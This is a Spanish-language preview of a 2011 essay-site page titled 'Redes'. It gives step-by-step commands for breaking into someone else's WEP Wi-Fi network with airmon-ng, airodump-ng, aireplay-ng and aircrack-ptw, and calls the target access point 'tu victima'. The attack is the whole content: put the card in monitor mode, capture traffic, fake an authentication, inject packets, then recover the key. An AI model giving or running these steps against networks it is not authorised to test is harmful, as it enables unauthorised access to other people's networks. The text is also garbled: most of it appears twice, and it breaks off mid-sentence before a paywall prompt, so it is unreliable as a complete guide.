Redes
Páginas: 2 (455 palabras)
Publicado: 4 de agosto de 2011
1. ABRIR LA SHELL, ( EL MS-DOS DE LINUX )
AHI PONES:
"iwconfig" que es para ver si linux detecta tu tarjeta wireless
a mi, Linux me muestra mi wireless como "eth0" y me basara en eso: 2. EN LA MISMA SHELL O KONSOLA
AHI PONES:
"airmon-ng stop eth0" DESTRUIMOS LA CONFIGURACION X DEFECTO
DESPUES
"airmon-ng start wifi0 6" CON ESTO PONEMOS MONO MONITOR ( QUE SIN MODOMONITOR NO SE PUEDE SACAR LAS WAPS O WEPS)
EL NUMERO 6 QUIERE DECIR QUE LA ABRIRA EN EL CANAL 6
PERO TU LA PUEDES CAMBIAR AL CANAL Q NECESITAS
3.
"airodump-ng -w NOMBRE -c6 eth0"
-c6:indica el canal a escanear, es super importante poner el canal bien
ejemplo: si el canal fuera 11, kedaria asi: -c11
NOMBRE: coloca cualkier nombre pero anotalo xq si todo sale bien despues lonecesitas colocar en un comando
4."aireplay-ng -1 30 -e XXXX -a MACV -h MACC eth0"
Ahora se explica el comando:
XXXX - Aquí va el ESSID de tu victima
MACV - Aquí va la dirección MAC de tuvíctima
MACC - Aquí debes introducir la dirección MAC de tu wlan.
Quedaría más o menos así:
"aireplay-ng -1 30 -e CASA356 -a 00:00:00:00:00 -h 00:00:00:01 eth0"
Con esto tu tarjetaquedará asociada con el punto de acceso víctima
PD: ESTO ES LO MAS IMPORTANTE!
SI NO TE DICE SUCEFULL REVISA TODO
[pic]
.
5. Ahora empezaremos a inyectar paquetes usando el siguientecomando:
aireplay-ng -3 -x600 -b MACV -h MACC eth0
(En este momento ya debes saber donde vas a sustituir y con que):
Quedaría más o menos así:
aireplay-ng -3 -x600 -b 00:00:00:00:00 -h00:00:00:00:01 ath0
Después de esto los paquetes empezarán a ser enviados.
Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave:
algunas veces tienes q tener un millon 6.Abres una nueva consola y escribes lo siguiente:
aircrack-ptw NOMBRE-01.cap (Aquí se utiliza el nombre de archivo que especificamos casi al principio al correr el airodump más el -01 o...
AHI PONES:
"iwconfig" que es para ver si linux detecta tu tarjeta wireless
a mi, Linux me muestra mi wireless como "eth0" y me basara en eso: 2. EN LA MISMA SHELL O KONSOLA
AHI PONES:
"airmon-ng stop eth0" DESTRUIMOS LA CONFIGURACION X DEFECTO
DESPUES
"airmon-ng start wifi0 6" CON ESTO PONEMOS MONO MONITOR ( QUE SIN MODOMONITOR NO SE PUEDE SACAR LAS WAPS O WEPS)
EL NUMERO 6 QUIERE DECIR QUE LA ABRIRA EN EL CANAL 6
PERO TU LA PUEDES CAMBIAR AL CANAL Q NECESITAS
3.
"airodump-ng -w NOMBRE -c6 eth0"
-c6:indica el canal a escanear, es super importante poner el canal bien
ejemplo: si el canal fuera 11, kedaria asi: -c11
NOMBRE: coloca cualkier nombre pero anotalo xq si todo sale bien despues lonecesitas colocar en un comando
4."aireplay-ng -1 30 -e XXXX -a MACV -h MACC eth0"
Ahora se explica el comando:
XXXX - Aquí va el ESSID de tu victima
MACV - Aquí va la dirección MAC de tuvíctima
MACC - Aquí debes introducir la dirección MAC de tu wlan.
Quedaría más o menos así:
"aireplay-ng -1 30 -e CASA356 -a 00:00:00:00:00 -h 00:00:00:01 eth0"
Con esto tu tarjetaquedará asociada con el punto de acceso víctima
PD: ESTO ES LO MAS IMPORTANTE!
SI NO TE DICE SUCEFULL REVISA TODO
[pic]
.
5. Ahora empezaremos a inyectar paquetes usando el siguientecomando:
aireplay-ng -3 -x600 -b MACV -h MACC eth0
(En este momento ya debes saber donde vas a sustituir y con que):
Quedaría más o menos así:
aireplay-ng -3 -x600 -b 00:00:00:00:00 -h00:00:00:00:01 ath0
Después de esto los paquetes empezarán a ser enviados.
Después de sobrepasados los 100,000 paquetes enviados se procede a obtener la clave:
algunas veces tienes q tener un millon 6.Abres una nueva consola y escribes lo siguiente:
aircrack-ptw NOMBRE-01.cap (Aquí se utiliza el nombre de archivo que especificamos casi al principio al correr el airodump más el -01 o...
Leer documento completo
Regístrate para leer el documento completo.